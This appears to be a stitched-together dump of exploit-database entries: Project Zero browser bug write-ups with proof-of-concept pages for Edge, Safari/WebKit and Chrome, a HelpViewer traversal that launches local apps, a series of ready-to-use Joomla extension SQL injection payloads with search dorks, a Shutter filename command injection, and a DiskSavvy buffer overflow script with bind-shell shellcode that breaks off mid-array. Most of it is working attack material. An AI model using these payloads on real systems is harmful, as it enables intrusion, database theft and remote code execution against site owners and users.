00000071`0e75c5e0 00007ffe`8e969d52 MSHTML!GlobalWndOnPaintPriorityMethodCall+0x1f7
00000071`0e75c690 00007ffe`afc13fe0 MSHTML!GlobalWndProc+0x1b8
00000071`0e75c710 00007ffe`afc13af2 USER32!UserCallWinProcCheckWow+0x1be
00000071`0e75c7e0 00007ffe`afc13bbe USER32!DispatchClientMessage+0xa2
00000071`0e75c840 00007ffe`b2352524 USER32!_fnDWORD+0x3e
00000071`0e75c8a0 00007ffe`afc1cfaa ntdll!KiUserCallbackDispatcherContinue
00000071`0e75c928 00007ffe`afc1cfbc USER32!ZwUserDispatchMessage+0xa
00000071`0e75c930 00007ffe`95d1bb28 USER32!DispatchMessageWorker+0x2ac
00000071`0e75c9b0 00007ffe`95d324cb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
00000071`0e75fc30 00007ffe`aa81572f IEFRAME!LCIETab_ThreadProc+0x3a3
00000071`0e75fd60 00007ffe`9594925f iertutil!Microsoft::WRL::ActivationFactory<Microsoft::WRL::Implements<Microsoft::WRL::FtmBase,Windows::Foundation::IUriRuntimeClassFactory,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil,Microsoft::WRL::Details::Nil>,Windows::Foundation::IUriEscapeStatics,Microsoft::WRL::Details::Nil,0>::GetTrustLevel+0x5f
00000071`0e75fd90 00007ffe`b1d313d2 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
00000071`0e75fde0 00007ffe`b22d54e4 KERNEL32!BaseThreadInitThunk+0x22
00000071`0e75fe10 00000000`00000000 ntdll!RtlUserThreadStart+0x34
And the following register values:
rax=0000007800000070 rbx=0000000000000064 rcx=0000007800000050
rdx=0000000000000048 rsi=00000079164a8f01 rdi=00007ffe8f9f81b0
rip=00007ffe8f330a59 rsp=000000710e75b960 rbp=0000007916492fe8
r8=0000007916490ec0 r9=000000710e75b980 r10=00000079164a8f30
r11=000000710e75b928 r12=000000710e75c000 r13=0000007916450fc8
r14=000000791648ec60 r15=0000007911ec9f50
Edge should crash when reading the same address while 32-bit IE tab process should crash in the same place but when reading a lower address.
Let's take a look at the code around the rip of the crash.
00007ffe`8f330a51 488bcd mov rcx,rbp
00007ffe`8f330a54 e8873c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
00007ffe`8f330a59 48833800 cmp qword ptr [rax],0 ds:00000078`00000070=????????????????
00007ffe`8f330a5d 743d je MSHTML!Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement+0xe7 (00007ffe`8f330a9c)
00007ffe`8f330a5f 488bcd mov rcx,rbp
00007ffe`8f330a62 e8793c64ff call MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable (00007ffe`8e9746e0)
00007ffe`8f330a67 488b30 mov rsi,qword ptr [rax]
00007ffe`8f330a6a 488b06 mov rax,qword ptr [rsi]
00007ffe`8f330a6d 488bb848030000 mov rdi,qword ptr [rax+348h]
00007ffe`8f330a74 488bcf mov rcx,rdi
00007ffe`8f330a77 ff155b95d700 call qword ptr [MSHTML!_guard_check_icall_fptr (00007ffe`900a9fd8)]
00007ffe`8f330a7d 488bce mov rcx,rsi
00007ffe`8f330a80 ffd7 call rdi
On 00007ffe`8f330a51 rxc is read from rbp and MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called which sets up rax. rcx is supposed to point to another object type, but in the PoC it points to an array of 32-bit integers allocated in Array<Math::SLayoutMeasure>::Create. This array stores offsets of table columns and the values can be controlled by an attacker (with some limitations).
On 00007ffe`8f330a59 the crash occurs because rax points to uninitialized memory.
However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the firs th element. Let's see what happens if an attacker can point rax to the memory he/she controls.
Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG check is made on that function pointer and, assuming it passes, the attacker-controlled function pointer is called on line 00007ffe`8f330a80.
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1057
Here's a snippet of Frame::setDocument.
void Frame::setDocument(RefPtr<Document>&& newDocument)
{
ASSERT(!newDocument || newDocument->frame() == this);
if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
m_doc->prepareForDestruction();
m_doc = newDocument.copyRef();
...
}
Before setting |m_doc| to |newDocument|, it calls |prepareForDestruction| that fires unload event handlers. If we call |Frame::setDocument| with the new document |a|, and call |Frame::setDocument| again with the new document |b| in the unload event handler. Then |prepareForDestruction| will be never called on |b|, which means the frame will be never detached from |b|.
PoC:
-->
"use strict";
let f = document.documentElement.appendChild(document.createElement("iframe"));
let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
a.contentWindow.onunload = () => {
f.src = "javascript:''";
let b = f.contentDocument.appendChild(document.createElement("iframe"));
b.contentWindow.onunload = () => {
f.src = "javascript:''";
let doc = f.contentDocument;
f.onload = () => {
f.onload = () => {
f.onload = null;
let s = doc.createElement("form");
s.action = "javascript:alert(location)";
s.submit();
};
f.src = "https://abc.xyz/";
};
};
};
f.src = "javascript:''";
<!--
Tested on Safari 10.0.2(12602.3.12.0.1).
-->
# # # # #
# Exploit Title: Joomla! Component Community Quiz v4.3.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_communityquiz
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/community-quiz/
# Demo: http://demo.corejoomla.com/quiz.html
# Version: 4.3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communityquiz&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=title&filter_all_keywords=1&filter_order=a.created&filter_order_Dir=asc&catid[]=[SQL]&view=quizzes
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1050
The second argument of window.open is a name for the new window. If there's a frame that has same name, it will try to load the URL in that. If not, it just tries to create a new window and pop-up. But without the user's click event, its attempt will fail.
Here's some snippets.
RefPtr<DOMWindow> DOMWindow::open(const String& urlString, const AtomicString& frameName, const String& windowFeaturesString,
DOMWindow& activeWindow, DOMWindow& firstWindow)
{
...
---------------- (1) -----------------------
if (!firstWindow.allowPopUp()) { <<---- checks there's the user's click event.
// Because FrameTree::find() returns true for empty strings, we must check for empty frame names.
// Otherwise, illegitimate window.open() calls with no name will pass right through the popup blocker.
if (frameName.isEmpty() || !m_frame->tree().find(frameName))
return nullptr;
}
--------------------------------------------
...
RefPtr<Frame> result = createWindow(urlString, frameName, parseWindowFeatures(windowFeaturesString), activeWindow, *firstFrame, *m_frame);
return result ? result->document()->domWindow() : nullptr;
}
RefPtr<Frame> DOMWindow::createWindow(const String& urlString, const AtomicString& frameName, const WindowFeatures& windowFeatures, DOMWindow& activeWindow, Frame& firstFrame, Frame& openerFrame, std::function<void (DOMWindow&)> prepareDialogFunction)
{
...
RefPtr<Frame> newFrame = WebCore::createWindow(*activeFrame, openerFrame, frameRequest, windowFeatures, created);
if (!newFrame)
return nullptr;
...
}
RefPtr<Frame> createWindow(Frame& openerFrame, Frame& lookupFrame, const FrameLoadRequest& request, const WindowFeatures& features, bool& created)
{
ASSERT(!features.dialog || request.frameName().isEmpty());
created = false;
---------------- (2) -----------------------
if (!request.frameName().isEmpty() && request.frameName() != "_blank") {
if (RefPtr<Frame> frame = lookupFrame.loader().findFrameForNavigation(request.frameName(), openerFrame.document())) {
if (request.frameName() != "_self") {
if (Page* page = frame->page())
page->chrome().focus();
}
return frame;
}
}
--------------------------------------------
<<<<<----------- failed to find the frame, creates a new one.
...
}
The logic of the code (1) depends on the assumption that if |m_frame->tree().find(frameName)| succeeds, |lookupFrame.loader().findFrameForNavigation| at (2) will also succeed. If we could make |m_frame->tree().find(frameName)| succeed but |lookupFrame.loader().findFrameForNavigation| fail, a new window will be created and popped up without the user's click event.
Let's look into |findFrameForNavigation|.
Frame* FrameLoader::findFrameForNavigation(const AtomicString& name, Document* activeDocument)
{
Frame* frame = m_frame.tree().find(name);
// FIXME: Eventually all callers should supply the actual activeDocument so we can call canNavigate with the right document.
if (!activeDocument)
activeDocument = m_frame.document();
if (!activeDocument->canNavigate(frame))
return nullptr;
return frame;
}
bool Document::canNavigate(Frame* targetFrame)
{
...
if (isSandboxed(SandboxNavigation)) { <<<--------------- (1)
if (targetFrame->tree().isDescendantOf(m_frame))
return true;
const char* reason = "The frame attempting navigation is sandboxed, and is therefore disallowed from navigating its ancestors.";
if (isSandboxed(SandboxTopNavigation) && targetFrame == &m_frame->tree().top())
reason = "The frame attempting navigation of the top-level window is sandboxed, but the 'allow-top-navigation' flag is not set.";
printNavigationErrorMessage(targetFrame, url(), reason);
return false;
}
...
if (canAccessAncestor(securityOrigin(), targetFrame)) <<<------------------- (2)
return true;
...
return false;
}
There are two points to make |Document::canNavigate| return false.
(1). Using a sandboxed iframe.
<body>
<iframe name="one"></iframe>
<iframe id="two" sandbox="allow-scripts allow-same-origin allow-popups"></iframe>
<script>
function main() {
two.eval('open("https://abc.xyz", "one");');
}
main()
</script>
</body>
(2). Using a cross-origin iframe.
-->
<body>
<iframe name="one"></iframe>
<script>
function main() {
document.body.appendChild(document.createElement("iframe")).contentDocument.location =
"data:text/html,<script>open('https://abc.xyz', 'one')</scri" + "pt>";
}
main()
</script>
</body>
<!--
Tested on Safari 10.0.2 (12602.3.12.0.1).
-->
# # # # #
# Exploit Title: Joomla! Component GPS Tools v4.0.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_gpstools
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/gps-tools/
# Demo: http://demo.corejoomla.com/tracks.html
# Version: 4.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_gpstools&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1049
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
Here's a snippet of FrameLoader::clear.
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
...
// Do this after detaching the document so that the unload event works.
if (clearWindowProperties) {
InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
if (shouldClearWindowName(m_frame, *newDocument))
m_frame.tree().setName(nullAtom);
}
...
m_frame.setDocument(nullptr); <<-------- (2)
...
}
The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
Tested on Safari 10.0.2(12602.3.12.0.1).
-->
<body>
<script>
/*
Apple WebKit: UXSS via FrameLoader::clear
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
Here's a snippet of FrameLoader::clear.
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
...
// Do this after detaching the document so that the unload event works.
if (clearWindowProperties) {
InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
if (shouldClearWindowName(m_frame, *newDocument))
m_frame.tree().setName(nullAtom);
}
...
m_frame.setDocument(nullptr); <<-------- (2)
...
}
The new document's window is attached at (1) before calling |m_frame.setDocument(nullptr)| that calls unload event handlers. So in the unload event handler, we could execute arbitrary javascript code on new document's window with a javascript: URI.
Tested on Safari 10.0.2(12602.3.12.0.1).
*/
"use strict";
function log(txt) {
//if (Array.isArray(txt))
// txt = Array.prototype.join.call(txt, ", ");
let c = document.createElement("div");
c.innerText = "log: " + txt;
d.appendChild(c);
}
function main() {
let f = document.body.appendChild(document.createElement("iframe"));
let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
a.contentWindow.onunload = () => {
let b = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
b.contentWindow.onunload = () => {
f.src = "javascript:''";
let c = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
c.contentWindow.onunload = () => {
f.src = "javascript:''";
let d = f.contentDocument.appendChild(document.createElement("iframe"));
d.contentWindow.onunload = () => {
f.src = "javascript:setTimeout(eval(atob('" + btoa("(" +function () {
alert(document.location);
} + ")") + "')), 0);";
};
};
};
};
f.src = "https://abc.xyz/";
}
main();
/*
b JSC::globalFuncParseFloat
*/
</script>
</body>
# # # # #
# Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitypolls
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/
# Demo: http://demo.corejoomla.com/polls.html
# Version: 4.5.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitypolls&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component Community Surveys v4.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitysurveys
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/community-surveys/
# Demo: http://demo.corejoomla.com/surveys.html
# Version: 4.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitysurveys&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2ajaxsearch
# Date: 24.02.2017
# Vendor Homepage: http://taleia.software/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/
# Demo: http://k2ajaxsearch.taleia.software/demo/
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan
# # # # #
# # # # #
# Exploit Title: Joomla! Component JO Facebook Gallery v4.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_jofacebookgallery
# Date: 24.02.2017
# Vendor Homepage: http://joomcore.com/joomla32/
# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-media/jo-facebook-gallery/
# Demo: http://demo.joomcore.com/joomla32/
# Version: 4.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=category&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=albums&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jofacebookgallery&view=photo&id=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component JooDatabase v3.1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_joodb
# Date: 24.02.2017
# Vendor Homepage: https://feenders.de/
# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/joodatabase/
# Demo: https://joodb.feenders.de/db-example.html
# Version: 3.1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=[SQL]&searchfield=Ihsan_Sencan
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=Ihsan_Sencan&searchfield=[SQL]
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
-->
<script>
/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
*/
function main() {
function second() {
var f = document.createElement("iframe");
f.onload = () => {
f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
};
f.src = "help:openbook=com.apple.safari.help";
document.documentElement.appendChild(f);
}
var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}
main();
</script>
# # # # #
# Exploit Title: Joomla! Component MultiTier v3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_multitier
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/affiliate-systems/multitier/
# Demo: http://www.beesto.com/extensions/13-j-multitier/40-demo
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodel&tid=1&lid=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=link_preview&id=[SQL]
# -66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+-- -
# http://localhost/[PATH]/index.php/component/multitier/?mtpage=takecodeb&tid=1&bid=[SQL]
# -66'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3+-- -
# # # # #
# # # # #
# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_userextranet
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/
# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL]
# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# # # # #
# # # # #
# Exploit Title: Joomla! Component Store for K2 v3.8.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2store
# Date: 23.02.2017
# Vendor Homepage: http://jworkplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/store-for-k2/
# Demo: http://k2store.jworkplace.com/
# Version: 3.8.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL]
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024
Chrome bug:
https://bugs.chromium.org/p/chromium/issues/detail?id=671328
PoC:
-->
<style>
content { contain: size layout; }
</style>
<script>
function leak() {
document.execCommand("selectAll");
opt.text = "";
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>
<!--
Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.
-->
# Exploit Title: Shutter user-assisted remote code execution
# Date: 2016-12-26
# Software Link: http://shutter-project.org/
# Version: 0.93.1
# Tested on: Ubuntu, Debian
# Exploit Author: Prajith P
# Website: http://prajith.in/
# Author Mail: me@prajith.in
# CVE: CVE-2016-10081
1. Description.
/usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
attackers to execute arbitrary commands via a crafted image name that is
mishandled during a "Run a plugin" action.
2. Proof of concept.
1) Rename an image to something like "$(firefox)"
2) Open the renamed file in shutter
3) Click the "Run a plugin" option and select any plugin from the list and click "Run"
3. Solution:
https://bugs.launchpad.net/shutter/+bug/1652600
Thanks,
Prajithh
# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters
# Date: 2017-02-22
# Exploit Author: Peter Baris
# Vendor Homepage: www.saptech-erp.com.au
# Software Link: http://www.disksavvy.com/downloads.html
# Version: 9.4.18
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
import socket
import sys
try:
host = sys.argv[1]
os = sys.argv[2]
port = 80
except IndexError:
print "[+] Usage %s <host> win7/win10" % sys.argv[0]
print "[i] Example: dsavvy.py localhost win10"
sys.exit()
# 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
